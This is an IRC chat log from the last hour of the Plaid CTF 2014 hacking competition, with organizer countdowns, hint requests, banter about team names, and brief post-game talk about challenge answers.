(15:11:27) qUit: (opxx) (5b79cbc3@gateway/web/freenode/ip.91.121.203.195) Quit: Page closed
(15:11:30) jOin: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139)
(15:11:39) (poppopret) is the polygon challenge supposed to be easy?
(15:11:47) (+tylerni7) fairly easy
(15:11:48) qUit: (sigsegv_) (7ab35ee7@gateway/web/freenode/ip.122.179.94.231) Quit: Page closed
(15:11:50) (+tylerni7) still 100 points though
(15:12:24) (deject3d_) for web100, we can assume the password length is what the page says right
(15:12:40) (dwn) I want to know how long hudak took mslc/dragon/etc.
(15:12:44) (dwn) because apparently I am really bad
(15:12:50) (Pitr_) Can someone explain the last step I'm missing in curlcore, in 1 hour? :)
(15:12:51) (poppopret) it's giving me an aneurysm
(15:12:56) (dwn) yea.
(15:13:01) (dwn) i mean it's fun
(15:13:03) (tokki) hudak means fast(?) in korean
(15:13:05) (+tylerni7) Pitr_: you can pm me... but I may not be able to help
(15:13:06) (dwn) but i am gonna take forever
(15:13:24) (factoreal) who solve web_200 reekee?
(15:13:38) (+tylerni7) factoreal: you can pm me specific questions about it
(15:13:53) (Hero2Morow) is parlor down?
(15:13:58) (+tylerni7) Hero2Morow: will check
(15:14:05) (+tylerni7) Hero2Morow: no
(15:14:55) (NK_) tylerni7: are you guys coming to phdays this year ?
(15:15:06) (+tylerni7) NK_: I think a few of us are...
(15:15:24) (positron_) gimme hints for kpop
(15:15:42) (Hero2Morow) cookie
(15:15:46) (Hero2Morow) jk i have no clue
(15:15:53) (Hero2Morow) jk i have no clue:(
(15:16:01) (Hero2Morow) ive bene trying to tolve it for 2 days :(
(15:16:07) (sven) hints are for the weak
(15:16:17) (tokki) lol if in any quals someone comes up and asks you for an autograph
(15:16:20) (tokki) that'll be me
(15:16:37) (+mserrano) < 45 minutes
(15:16:43) jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
(15:16:46) (sven) fuckfuckfuck
(15:16:48) (tokki) *gasp*
(15:17:00) (+houqp_) gogogogogo
(15:17:03) (architekt) gogoogo
(15:17:17) (+houqp_) geobot: gogogogogo
(15:17:17) (tokki) gogogogog
(15:17:20) (+tylerni7) dragon sector! you still have time!
(15:17:29) (Hero2Morow) gooooooooooooooooooo
(15:17:37) (tokki) EVERYONE FTW
(15:17:56) (inter) what if i told you the real winner is tylerni7
(15:18:02) (+tylerni7) you would be wrong
(15:18:06) (halfvollemelk) gogogogogo GUYS!
(15:18:07) (inter) he spread the bronies around
(15:18:10) (inter) infecting normal people
(15:18:18) (+ricky) So cloes so close :-)
(15:18:37) (Hero2Morow) DRAGON SECTOR JUST GOT POINTS
(15:18:40) (Hero2Morow) DAYYYUUUU,
(15:18:41) (Hero2Morow) M
(15:18:46) (tokki) DAYUMMMMMN
(15:18:47) (acez) anyone here for 'jackshit' challenge ?
(15:18:47) (Pitr_) thanks tylerni7, I've got one more thing to try
(15:18:50) (+ricky) Uh oh
(15:18:51) (+tylerni7) ok
(15:19:00) (+mserrano) Hero2Morow: u wot m8
(15:19:02) (acez) tylerni7: 'jackshit' challenge admin around ?
(15:19:07) (+mserrano) acez: ping clockish
(15:19:12) (acez) thanks
(15:19:17) (clockish) yeah me
(15:19:39) (tokki) fuck my itunes just came on
(15:19:43) (tokki) and scared the shit out of me
(15:20:34) qUit: (batzig_) (
[email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
(15:20:43) (+mserrano) < 40
(15:21:14) (halfvollemelk) gotta go, great CTF! thanks guys
(15:21:21) (Hero2Morow) you could fuck with people so hard
(15:21:21) (+mserrano) everybody
(15:21:24) (+tylerni7) halfvollemelk: thanks for playing!
(15:21:25) (+mserrano) ricky's favorite pony
(15:21:28) (+mserrano) is Princess Celestia
(15:21:30) (Hero2Morow) by solving a good amount fo the problems
(15:21:33) (tokki) ooh
(15:21:38) (Hero2Morow) but saving the flags for the last 20 minuteds
(15:21:43) (+tylerni7) Hero2Morow: yeahh...
(15:21:43) qUit: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60) Quit: Page closed
(15:21:43) (Hero2Morow) and just jump to the top
(15:21:48) (+tylerni7) that's called "being a dick"
(15:21:58) (acez) btw the ctf ends in 40 minutes ?
(15:22:04) (+tylerni7) acez: 38
(15:22:05) (+tylerni7) but yeah
(15:22:08) (+tylerni7) (as in, on time)
(15:22:14) (acez) k thanks
(15:22:42) (Sin__) what did you guys do since the start to make the website more responsive ?
(15:22:42) (geobot) hadn't been responsive
(15:22:52) (tomcr00se) i think i'm too tired for jackshit
(15:22:56) (+tylerni7) Sin__: awesie has a writeup about the site
(15:23:12) (Sin__) okay, cool
(15:23:16) (+tylerni7) it'll get posted after the ctf
(15:23:19) (tomcr00se) all looks like best quality code to me
(15:23:24) (+mserrano) tomcr00se: jackshit may be broken
(15:23:28) (+ricky) tomcr00se: I think 0xffa solved bronies 2 in about 2 hours or less - you can do it in 30 min, right?
(15:23:36) (+mserrano) we are checking
(15:23:40) (acez) thanks
(15:23:44) (+ricky) Solved meaning got super super cloes
(15:23:45) (+tylerni7) mserrano: it's /probably not/ broken
(15:23:48) (+tylerni7) but it might be
(15:24:20) (tomcr00se) mserrano: OMG THATS JACKSHIT
(15:24:29) (+ricky) Hahaha
(15:24:43) (tomcr00se) i work so hard
(15:24:56) (tomcr00se) think i deserve hint for _nightmare_
(15:24:57) (+ricky) Oh maybe more like 3 hours, not sure
(15:24:58) (ciliated) where the flag is in reekee
(15:25:00) (+ricky) Anyway :-)
(15:25:13) (+ricky) The flag is reekee is in a file somewhere I believe
(15:25:16) (tokki) tomcr00se: they're gonna give the hint 30 seconds before the ctf ends
(15:25:29) (oceanx) tomcr00se: everyone deserves a hint for _nightmare_ :P
(15:25:30) (geobot) skier_ did you get a hint for _nightmare_
(15:25:52) (vladum_) quick question about reekee, please?
(15:26:03) (+ricky) vladum_: pm tylerni7
(15:26:06) (ciliated) +ricky: at which directory?
(15:26:18) (+ricky) ciliated: Not sure what directory, you don't need to know to solve it
(15:26:22) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(15:26:24) (sdjakl) geobot: ffa hasn't gotten any hints
(15:26:25) (geobot) he kinda surprised it hasn't really appreciate your sentiment
(15:26:32) tokki looks at clock looks at clock looks at clock throws clock
(15:27:59) (poppopret) is web150 considered easy or hard?
(15:27:59) (geobot) what 8 ctfs offer the most realistic data fetch and not a brony, fwiw, i think some of you sobs do you ball so hard?
(15:28:02) qUit: (phiber__) (
[email protected]) Read error: Connection reset by peer
(15:28:19) (comex) geobot: i'm a brony
(15:28:37) (+tylerni7) geobot: did you like the site?
(15:28:39) (+tylerni7) er
(15:28:41) (+tylerni7) comex: *
(15:28:46) (+ricky) Did you know all the captchas from memor?
(15:28:52) (comex) tylerni7: i was asleep for the actual brony part though :(
(15:28:55) (+tylerni7) aww
(15:29:00) (+tylerni7) that makes me sad
(15:29:20) +ricky whistles
(15:29:27) mOde: (ChanServ) sets (+o mserrano)
(15:29:33) (comex) i like the fading colors though
(15:29:44) tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 30 minutes left | $40 added to each cash prizes so far (from CHANCE card))
(15:29:47) mOde: (mserrano) sets (-o mserrano)
(15:29:50) (+tylerni7) comex: yeah, top notch web skillz
(15:29:50) (geobot) all 8 users around but nothing that i put into how teams are your skillz at cracking sql dump seem to work with: ctf though -_-
(15:29:57) (ryan-c) yay, got parlor
(15:30:28) (sdjakl) tylerni7: I swear, the things you made me go through for reekee
(15:30:35) (clockish) jackshit updated to remove the stack protector
(15:30:40) qUit: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-adqrbntyqeceebtc) Quit: Connection closed for inactivity
(15:30:42) (sdjakl) tylerni7: (speaking of web skills)
(15:31:03) (+dickoff) ANNOUNCE: ---------------- jackshit updated to remove the stack protector --------------------------------
(15:31:06) (Beched) huh
(15:31:20) (Beched) btw rather nice ctf, i thought it will be worse
(15:31:24) (iZsh) meh
(15:31:27) (Beched) i mean ppp never makes bad tasks
(15:31:28) (zoku) ricky: could you installs trace on the nightmare box?
(15:31:28) (ius) ricky: reporting in for knowing some PONIES by heart by now
(15:31:29) (+tylerni7) sdjakl: :)
(15:31:31) (+tylerni7) Beched: haha
(15:31:33) (Beched) but they make only PWN
(15:31:35) (iZsh) why do you guys change the binary 30min before the end?
(15:31:41) (Beched) and now there're various categories
(15:31:42) (+tylerni7) iZsh: because we fucked it up
(15:31:42) (zoku) ricky: trying to debug my ezhp exploit
(15:31:50) (+ricky) Congrats 0xfaa for solving Bronies 2!
(15:31:51) (Beched) but lol even in web there's pwn xD
(15:31:51) (geobot) we should make only pwn a setuid binary so ida
(15:31:54) (+cai_) Grats :)
(15:31:55) (+ricky) Nicely done!
(15:31:55) (iZsh) yeah but we worked with that :s
(15:31:56) (_blasty_) b0w d0wn
(15:31:57) (_blasty_) BOW DOWN
(15:31:58) (+mserrano) 0xffa: gg :D
(15:31:59) (+ricky) Good game
(15:32:00) (+tylerni7) :O
(15:32:05) (tokki) I L PolygonShifter
(15:32:09) (+mserrano) (for that problem anyway)
(15:32:12) (tokki) <3
(15:32:16) (+ricky) Sorry for that horrible C++
(15:32:27) (+tylerni7) dragon sector! better finish up bronies!
(15:32:40) (+tylerni7) :O
(15:32:47) (hellman_) gg
(15:32:49) (iZsh) meh, i was working on jackshit :s
(15:32:51) (wtbw) chronosphere due to discharge after the game is over
(15:32:55) (+tylerni7) iZsh: it's basically the same
(15:33:00) pArt: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) "WeeChat 0.4.1"
(15:33:00) (+mserrano) iZsh: the problem is the same, just no stack protector
(15:33:05) (Beched) иец
(15:33:07) (Beched) btw
(15:33:12) (ryan-c) who the hell is 0xffa?
(15:33:13) (Beched) who are 0xffa ? O_O
(15:33:15) (Beched) lol
(15:33:16) (tokki) ㅣㅐㅣ
(15:33:17) (tokki) lol
(15:33:18) (ryan-c) lol
(15:33:21) (+tylerni7) heh
(15:33:22) (zoku) ricky: any other suggestions?
(15:33:24) (ius) do the maths
(15:33:27) (ius) it'll check out
(15:33:30) (+frozencemetery) have you ever really looked at your hands?
(15:33:30) (zoku) ricky: I'm having a hell of a time debugging over a connectback shell with no tools
(15:33:31) (ryan-c) tylerni7: parlor was fun, thanks :D
(15:33:32) (+tylerni7) :P
(15:33:40) (+tylerni7) ryan-c: glad you enjoyed it :)
(15:33:56) (+tylerni7) ius: but.. addition is hard
(15:33:59) (+tylerni7) much like multiplication
(15:34:04) (foundation) no eindbazen this year? i guess they must have forgotten their password ?
(15:34:08) (tokki) lol
(15:34:16) (+mserrano) no way
(15:34:17) (sdjakl) 0xffa = x+y for x,y (in) Z
(15:34:18) (Beched) heh
(15:34:20) (+mserrano) we email it to them in plaintext
(15:34:24) (tokki) lol
(15:34:27) (Beched) yeah btw, Eindbazen have gone
(15:34:43) (Beched) hm
(15:34:59) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(15:35:01) (ius) x + y = 0xffa, solve for x,y indeed ;)
(15:35:19) jOin: (random_user_23) (5d6846fd@gateway/web/freenode/ip.93.104.70.253)
(15:35:25) (+ricky) zoku: I think clockish is installing it now
(15:35:29) (ryan-c) tylerni7: is the ctf ending on time, or being extended an hour or two?
(15:35:32) (clockish) yeah, I'll do it
(15:35:35) (+tylerni7) ryan-c: ending on time
(15:35:39) (+dickoff) ryan-c: it is ending in 25 minutes
(15:35:40) (+tylerni7) as we have been saying :P
(15:35:46) (+tylerni7) it's a 48 hour competition
(15:35:52) (+tylerni7) you've all had plenty of time :)
(15:35:55) (clockish) zoku: anything else you want?
(15:35:55) (wtbw) frozencemetery: woah, I have *fingers*
(15:35:56) (Beched) ius
(15:36:03) (Beched) i remember you're from eindbazen, aren't you?
(15:36:13) (Beched) 0xffa == Eindbazen ??? O__O
(15:36:18) (+tylerni7) + ...
(15:36:21) (+mserrano) O__O
(15:36:22) (tokki) O__O
(15:36:25) (+tylerni7) 0xffa > 0xeb
(15:36:27) (mathiasbynens) mind = blown
(15:36:29) (sdjakl) yeah tylerni7 seems to have gotten it
(15:36:30) (+frozencemetery) wtbw: weeeeeiiiiiiirdddd
(15:36:31) (dkohlbre) | (•□•) |
(15:36:50) (zoku) nah clockish, gdb is already installed but I can't use it over connectback anyways >_<
(15:36:53) (zoku) lol
(15:36:56) (ius) tylerni7: close ;)
(15:37:02) (tokki) lol
(15:37:07) (+tylerni7) ius: I know, I don't wanna give it away though :P
(15:37:14) (ius) :D
(15:37:29) (sven) it's not that hard anymore now :P
(15:37:39) (+ricky) zoku: Sorry, I was mistaken, apparently the machine is different from ezhp so things might be different
(15:37:46) (Gynvael) wtf chacning the jackshit binary --;
(15:37:57) (+mserrano) Gynvael: it's the same, but no stack protector =\
(15:37:58) (+ricky) Not sure what to suggest other than getting a similar env setup or staring more to figure out why your addresses aren't matching up
(15:37:58) (_blasty_) holy fuck my heart is pounding through my chest
(15:38:04) (Gynvael) comeone, we had the exploit almost working
(15:38:06) (+ricky) Hehe yeah, that was tight timing
(15:38:11) (+ricky) Gynvael: You still have time!
(15:38:13) (Gynvael) and now the layout of stack changed ;/
(15:38:16) (+ricky) Oh jackshit, never mind
(15:38:20) (zoku) yea, I've tried on debian and ubuntu ricky ;/
(15:38:21) (+mserrano) Gynvael: pm clockish
(15:38:24) (+ricky) Ah, sorry - we're starting a copy of the old one up I think
(15:38:34) (clockish) Gynvael: sorry! I'll get the old one back up
(15:38:40) (+tylerni7) new one should be strictly easier, but...
(15:38:46) pArt: (handlr) (~handlr@unaffiliated/handlr)
(15:39:19) mOde: (ChanServ) sets (+o mserrano)
(15:39:29) tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 20 minutes left | $40 added to each cash prizes so far (from CHANCE card))
(15:39:33) mOde: (mserrano) sets (-o mserrano)
(15:39:36) (nopple) lol i was also right at the point where it might have hurt more than helped on it, but i started going forward with new version already...
(15:39:37) (geobot) just hurt firefox os's feelings on default ubuntu think yeah crowell you're going to be nice to be awesome
(15:39:50) (Beched) geobot != tomcr00se ?
(15:39:58) (+tylerni7) lol
(15:40:46) (tokki) lol
(15:40:48) (ryan-c) lol
(15:40:57) (ryan-c) hellman: WHAT DID YOU DO
(15:41:28) (tokki) lol
(15:41:39) jOin: (shabgard) (~mostafa@unaffiliated/shabgard)
(15:41:51) (iZsh) you guys still haven't figured out what 0xffa is? ;-)
(15:41:52) (ciliated) reekee is not directory traversal?
(15:42:03) (+houqp_) Beched: you need to ask geobot
(15:42:04) (sven) it's really not hard :P
(15:42:06) (+tylerni7) ciliated: you can pm me
(15:42:07) (_blasty_) Who will solve the 0xFFA puzzle first ?
(15:42:18) (iZsh) yeah 0xffa is a CTF chall :)
(15:42:20) (_blasty_) :-)
(15:42:20) (arthurdent) it's a xor of two teams
(15:42:23) (sven) nope
(15:42:25) (+mserrano) some of us have already "solved"
(15:42:27) (+mserrano) :P
(15:42:27) (_blasty_) warm.
(15:42:30) (sven) close though.
(15:42:51) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
(15:42:54) (paul_axe) hi, who can i ask about kpop?
(15:42:57) (AnthraX101) XOR? Like those who were in both before were not allowed in?
(15:42:57) (geobot) it did do it in?
(15:43:00) (+tylerni7) paul_axe: mserrano
(15:43:00) (+mserrano) paul_axe: me
(15:43:01) (sven) [22:34:59] <sdjakl> 0xffa = x+y for x,y (in) Z
(15:43:07) (sven) now find x and y!
(15:43:13) (Beched) paul_axe: O_O ты за кого?)
(15:43:17) (sdjakl) if its clearer I can use latex notation
(15:43:23) (_blasty_) :-)
(15:43:32) (paul_axe) Beched: solo ;)
(15:43:40) (Beched) =)
(15:43:48) (sven) another hint: sdjakl is part of 0xffa
(15:43:54) (+tylerni7) Beched: english plz
(15:44:01) (plaintext) it's gg for us I guess
(15:44:06) (+dickoff) but I hear addition is hard, how will I ever solve for x and y?
(15:44:15) (zoku) clockish: is nightmare NATed?
(15:44:16) (iZsh) dickoff: :)
(15:44:36) (+mserrano) <= 15 minutes
(15:44:40) (inter) zoku: no its under alcatraz
(15:44:52) (zoku) fuck
(15:45:01) (poppopret) do ppl score points often in the last couple of minutes?
(15:45:02) qUit: (Im11Plus) (
[email protected]) Remote host closed the connection
(15:45:36) (iZsh) poppopret: when you're #1, murphy says yes
(15:45:46) (iZsh) when you're #2, murphy says no
(15:45:49) (plaintext) multiplication hint plox :P
(15:45:54) (sven) yeah, 1 second before the end ofc
(15:45:59) (+tylerni7) iZsh: or still says yes, and you move down to 3rd :(
(15:46:06) (zoku) what system is ezhp running on??
(15:46:12) (zoku) 32bit debian??
(15:46:13) (iZsh) tylerni7: heh yeah, i didn't think of this way ;-)
(15:46:17) (poppopret) OS X
(15:46:24) (hellman) Thx ppp for cool ctf (and teams), i think i'm off now :) gg
(15:46:31) (+mserrano) :) see ya hellman
(15:46:33) (+tylerni7) hellman: o/
(15:46:35) (corpille) any lasts minute hint on mtpox ?
(15:46:39) (+dickoff) hellman: o/
(15:46:46) (clockish) Gynvael: it's up at 1283
(15:46:57) (clockish) Gynvael: the port patch is the only difference
(15:47:00) (Adran) any chance web100 might be usable until the end? :(
(15:47:00) (Gynvael) thx
(15:47:02) (tokki) k lets chat i think i'm ready for the write ups
(15:47:05) (zoku) clockish: do you admin the ezhp box too??
(15:47:05) (clockish) Gynvael: super sorry
(15:47:10) (clockish) zoku: no
(15:47:30) (tokki) we're still stuck on crypto 20 ;)
(15:47:30) (geobot) and 20 minuteds
(15:47:36) (+ricky) 12 minutes left!
(15:47:44) (rray) geobot: hi
(15:48:05) (_blasty_) np: Jace Hall - LOL MONEY
(15:48:18) (sven) :>
(15:48:33) (Adran) ricky: poor web100, everyone seems to be just hammering it right now
(15:48:33) (geobot) for web100, we can some other people
(15:48:35) (sdjakl) sven: so do we tell em at timeout; or just wait for the writeups ;)
(15:48:46) (sven) sdjakl: timeout sounds good :)
(15:48:57) +ricky is rooting for DS to solve jackshit
(15:48:59) (sven) it's seriously obvious now
(15:49:46) mOde: (ChanServ) sets (+o mserrano)
(15:49:55) tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 10 minutes left | $40 added to each cash prizes so far (from CHANCE card))
(15:49:57) (iZsh) ricky: we're still trying to solve 2 others :)
(15:50:02) (iZsh) might get one in time
(15:50:03) (iZsh) :)
(15:50:34) jOin: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
(15:51:06) qUit: (cimmi_) (1f2d47df@gateway/web/freenode/ip.31.45.71.223) Ping timeout: 240 seconds
(15:51:20) (+ricky) :-)
(15:51:24) (Guest68736) who can i ask for web100 ?
(15:51:24) (geobot) then does have to get in the video on web100 is so difficult
(15:51:25) (@mserrano) 8
(15:51:39) (Hero2Morow) what's the highest number of points possible?
(15:51:41) (+ricky) 7.73
(15:51:48) (mischa__) there is a web100?
(15:51:49) (geobot) web100?
(15:51:52) (dkohlbre) man this machine's clock is off by 3.5 minutes wtf
(15:51:59) (tokki) lol
(15:52:14) (Guest68736) yeah web100
(15:52:15) (poppopret) what time is it on the server's clock
(15:52:18) (Guest68736) who can i ask for it ?
(15:52:18) (Adran) there is a web100 when it decides to load
(15:52:56) (@mserrano) 7
(15:53:09) (poppopret) 7?
(15:53:12) (Guest68736) mserrano: can i ask you smt for web100? in private
(15:53:13) (geobot) i feel bad for web100?
(15:53:25) (@mserrano) 6
(15:53:39) (poppopret) more minutes?
(15:53:49) (@mserrano) yes
(15:53:52) (|x_x|) By the technological gods.
(15:53:54) (|x_x|) I nodded off.
(15:53:55) (|x_x|) >_<
(15:53:58) (LuckyY) but but chronosphere discharges in 8 minutes
(15:54:01) (Guest68736) someone i can pm for web100?
(15:54:04) (|x_x|) Dropped six places. Y_Y
(15:54:10) (tokki) lol the chronosphere
(15:54:16) (tokki) dat chronosphere
(15:54:25) (@mserrano) 5
(15:54:41) (|x_x|) Quick, everyone send me your keys. >_>
(15:54:49) (inter) trading keys
(15:54:54) (inter) dota2 keys for tf2 keys
(15:54:54) (geobot) so, tf2 is linked to sit on the edge of
(15:54:56) (inter) 1:1 ratio
(15:54:57) (yyyyyyy) |x_x|: http://www.dabeagle.com/images/old-golden-key.jpg
(15:54:57) (geobot) |x_x|: correct
(15:54:59) (Ymgve) blah, I could have done moscow if I had one more hour
(15:55:03) (poppopret) everyone refresh the hints page
(15:55:04) (phiber__) how much left?
(15:55:06) (inter) add my steam: pctfpls
(15:55:17) (Guest68736) someone i can pm for web100?
(15:55:22) (|x_x|) I've got a sanity check key up for swap. pst.
(15:55:22) (geobot) just read the story, basically they don't reuse keys from when we solved sanity check
(15:55:23) (@mserrano) 4min
(15:55:24) (poppopret) lol guest68736
(15:55:36) (Guest68736) i have the awnser i need something else
(15:55:42) (inter) clockish: im waiting on your writeup
(15:55:52) (tokki) 4min 240seconds!
(15:55:55) (iago-x86) Well, I guess that's it
(15:56:00) (iago-x86) I'm not solving anything by then :)
(15:56:09) (inter) 4 minute 20 seconds
(15:56:10) (tsuro) iago-x86: same here :)
(15:56:12) (iago-x86) Damn you, blackjack!
(15:56:16) (iago-x86) tsuro: How'd you do?
(15:56:17) (inter) 420 blaze it
(15:56:19) (@mserrano) 3min
(15:56:19) (Ymgve) hope no one solves moscow
(15:56:22) (tokki) damn
(15:56:37) (tsuro) iago-x86: we're still 4th, crossing my fingers :)
(15:56:38) (@mserrano) Ymgve: I don't think anyone will :(
(15:56:43) (clockish) inter: heh, I'll just pm you the short version, other ppl can post real writeups :P
(15:56:46) (iago-x86) nice :)
(15:56:51) (tokki) tsuro: ftw!
(15:56:52) (wtbw) moscow got released a bit late it seems
(15:56:53) (_blasty_) j00 kn0w h4ck3rz lyk3 2 s3ll drugZ?
(15:56:55) (wtbw) downside of the board system
(15:56:59) (sven) we'd need another hour for moscow :/
(15:57:07) (iago-x86) tsuro: we're 36th, but with only 3 people who solved anything :)
(15:57:17) (+ricky) That's pretty impressive
(15:57:20) (@mserrano) 2 mi
(15:57:21) (@mserrano) n
(15:57:35) (wtbw) sven: if it was windows I might've managed it
(15:57:39) (wtbw) got a few more tools there :)
(15:57:41) (yyyyyyy) mserrano, what's a mi?
(15:57:42) (tomcr00se) i mean, 13th is better than 12th
(15:57:45) (wtbw) minute
(15:57:50) (@mserrano) yyyyyyy: meant minute, hit enter too early
(15:57:50) (asmoday) PENCILS DOWN GAME OVER
(15:57:55) (wtbw) tomcr00se: pft!
(15:57:58) (tokki) mserrano: lol
(15:58:00) (clockish) asmoday NOT YET
(15:58:01) (tsuro) iago-x86: yeah, we were far more than that
(15:58:03) (+ricky) Please pass your exam booklets to the front
(15:58:07) (+tylerni7) ricky: heh
(15:58:15) (chrissing) hahaha
(15:58:20) (@mserrano) 1 minute
(15:58:29) (iago-x86) I personally solved 7 challenges
(15:58:30) (tomcr00se) let me just submit my cheating stored keys brb one sec
(15:58:30) (geobot) brb - registering for the transposition cipher was hacktastic
(15:58:30) (+ricky) Who will submit the last key?
(15:58:31) (tsuro) iago-x86: we even have 3 students who get credits at our university if they play CTF competitions
(15:58:37) (iago-x86) Nice! :)
(15:58:38) (+tylerni7) tomcr00se: :P
(15:58:40) (iZsh) dammit ENOTIME
(15:58:42) (+cai_) almost over
(15:58:45) (+cai_) in few seconds
(15:58:53) (inter) tomcr00se: ill give you a cookie with raisins in it
(15:58:57) (sven) time for murphy now
(15:59:06) (@mserrano) o.o
(15:59:08) (+ricky) 10
(15:59:12) (_blasty_) 9
(15:59:13) (zoku) nnooooo
(15:59:13) (|x_x|) 5
(15:59:13) (Ymgve) give tips for all tasks now pls
(15:59:14) (+ricky) 5
(15:59:16) (Adran) 4
(15:59:17) (+ricky) 2
(15:59:17) (+ricky) 1
(15:59:17) (|x_x|) 1
(15:59:18) (Adran) 3
(15:59:18) (+ricky) 0
(15:59:18) (poppopret) 4
(15:59:19) (yyyyyyy) -1e100
(15:59:19) (poppopret) 2
(15:59:20) (zoku) nooo wayyy
(15:59:20) (Reinhart) -1
(15:59:20) (poppopret) 5
(15:59:20) (Adran) -1
(15:59:20) (poppopret) 6
(15:59:21) (rray) 2 minutes left? guess i should start on bronies now
(15:59:22) (wtbw) omg_not_a_real_key
(15:59:22) (Reinhart) -2
(15:59:23) (+dickoff) GG!
(15:59:23) (|x_x|) ln(1023)
(15:59:24) (@mserrano) game over
(15:59:25) (+ricky) Good game!
(15:59:25) (_blasty_) >>> "%x" % (0xf0f+0xeb)
(15:59:25) (_blasty_) 'ffa'
(15:59:28) (sdjakl) woooo
(15:59:29) (tomcr00se) GG FOLKS
(15:59:30) jOin: (sssssssss) (5a9c5102@gateway/web/freenode/ip.90.156.81.2)
(15:59:31) (Gynvael) GG
(15:59:31) (+cai_) GAME OVER
(15:59:31) (LuckyY) 502 Bad Gateway
(15:59:32) (chrissing) It was fun
(15:59:32) (+cai_) gg
(15:59:32) (LuckyY) :D
(15:59:33) (rray) gg
(15:59:33) (architekt) Good Game 8-)
(15:59:33) (poppopret) and 502 bad gateway!!
(15:59:35) (whois) good
(15:59:35) (iZsh) \o/
(15:59:36) (|x_x|) Now that it's all over. I'm going to spoil one of the challenges for you guys. Sanity Check's key was "poop"
(15:59:36) (wtbw) thanks PPP :)
(15:59:36) (computerality) _blasty_: mind=blown
(15:59:36) (geobot) didn't know that haven't solved sanity check key easily trackable by then :)
(15:59:37) (muchacho) wtf was the path in kpop?
(15:59:38) (x56) woop woop! gg and thanks :)
(15:59:39) (mischa__) nice ctf
(15:59:39) (iZsh) jeez
(15:59:40) (Adran) poppopret: yeah
(15:59:42) mOde: (ChanServ) sets (+o cai_)
(15:59:44) (tokki) gg :D
(15:59:46) (plaintext) GG
(15:59:48) (ius) Thanks!
(15:59:49) (+dickoff) thanks for playing everyone :)
(15:59:49) (plaintext) thanks for the ctf
(15:59:52) (plaintext) what was multiplication?
(15:59:53) (KT) ok guy, whats 38.55 * 1700?
(15:59:54) (inter) gg
(15:59:56) (Ymgve) great ctf!
(15:59:56) (iZsh) so yeah, 0xffa = f0f + e
(15:59:57) (khloe_k) thx PPP
(15:59:58) (x56) 100000
(15:59:58) (Otacon22) gg
(16:00:00) (tomcr00se) 100,000
(16:00:00) (iZsh) so yeah, 0xffa = f0f + eb
(16:00:00) (Gynvael) gg
(16:00:01) (corpille) 100000
(16:00:01) (@mserrano) 38.55 * 1700 was 100000
(16:00:02) (Ymgve) KT: 100000 or something, excel bug
(16:00:02) (plaintext) wat
(16:00:03) pArt: (HockeyInJune) (sid17970@gateway/web/irccloud.com/x-ctjiaaopkbcjhczm)
(16:00:03) (plaintext) why
(16:00:04) (tokki) thanks for making such an awesome ctf
(16:00:04) (architekt) Nice Game PPP
(16:00:05) (@mserrano) because of an excel 2007 bug
(16:00:07) (warrick) GOOOD GAME, THANKS PPP
(16:00:09) (tomcr00se) what was _nightmares_
(16:00:10) (ltfish) thank you guys for this game!
(16:00:10) (tokki) NOW TIME FOR WRITE UPS
(16:00:17) (tokki) thanks PPP :D
(16:00:18) (tomcr00se) real python pwning with shellcode?
(16:00:19) (wtbw) graphs was my favourite
(16:00:19) (geobot) we used it on how the pwning
(16:00:21) (Gynvael) thanks PPP ;)
(16:00:22) (_blasty_) THE FINAL FAIL ALLIANCE WOULD LIKE TO THANK PPP
(16:00:22) (Gynvael) gz 0xffa
(16:00:23) (plaintext) wh yis it 100,000?
(16:00:23) (|x_x|) http://scienceblogs.com/goodmath/2007/10/02/the-excel-65535100000-bug/ Read up on the 38.55 * 1700
(16:00:24) (Pitr_) thanks PPP!
(16:00:24) (Guest26684) redesvouz cookie, what was the BEEF damnit
(16:00:25) (_blasty_) FOR DIZ GAME
(16:00:27) (iZsh) thx guys
(16:00:28) (Ymgve) what was trojaned in the gcc challenge?
(16:00:29) tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] GG; congrats 0xffa, Dragon Sector, MSLC | $40 added to each cash prizes so far (from CHANCE card))
(16:00:29) (bool_101) thanks PPP for a great game!
(16:00:29) (+tylerni7) Gynvael: you're welcome, nice job!
(16:00:32) (kris) GG
(16:00:34) nIck: (bool_101) is now known as (bool101)
(16:00:36) (tokki) lol
(16:00:37) (comex) Ymgve: openssl
(16:00:37) (+awesie) http://lmgtfy.com/?q=65535+multiplication
(16:00:37) (moki) thanks for hosting this
(16:00:37) (plaintext) oh so it was trivia
(16:00:39) (plaintext) nice
(16:00:39) (+houqp_) Guest26684: it's the beef
(16:00:40) (|x_x|) Multiplication is hard is an old Excel Sheet bug.
(16:00:41) (inter) thanks to mserrano, awesie, dickoff, frozencemetery, gbarboza, houqp_, ricky, tylerni7, and clockish for awsome challenges
(16:00:41) (dkohlbre) ok bbos, what was the password, I got into the emulator but it told me the key was the password :/
(16:00:42) (iago-x86) Gynvael: Hey, looking forward to our debrief at work :)
(16:00:43) (tokki) LeaveRet had an awesome time :D
(16:00:44) (abuss) Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
(16:00:45) (geobot) did a writeup
(16:00:48) tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] IT'S OVER! | Survey: http://bit.ly/1ifQBOo | $40 added to each cash prizes so far (from CHANCE card))
(16:00:51) (ryan-c) so, did anyone solve rsa from scratch?
(16:00:53) (Adran) mserrano: thats terribe
(16:00:54) (clockish) tomcr00se: nightmares was writing to /proc/self/mem
(16:00:55) (poppopret) how'd you guys all do??
(16:00:55) (tokki) DAT MONIEZ
(16:00:57) (Gynvael) iago-x86: ;)
(16:01:01) (+dickoff) inter: you forgot cai_ !
(16:01:01) (abuss) (ignore the nuit du hack title, I don't know how2jekyll)
(16:01:01) (+frozencemetery) inter: :)
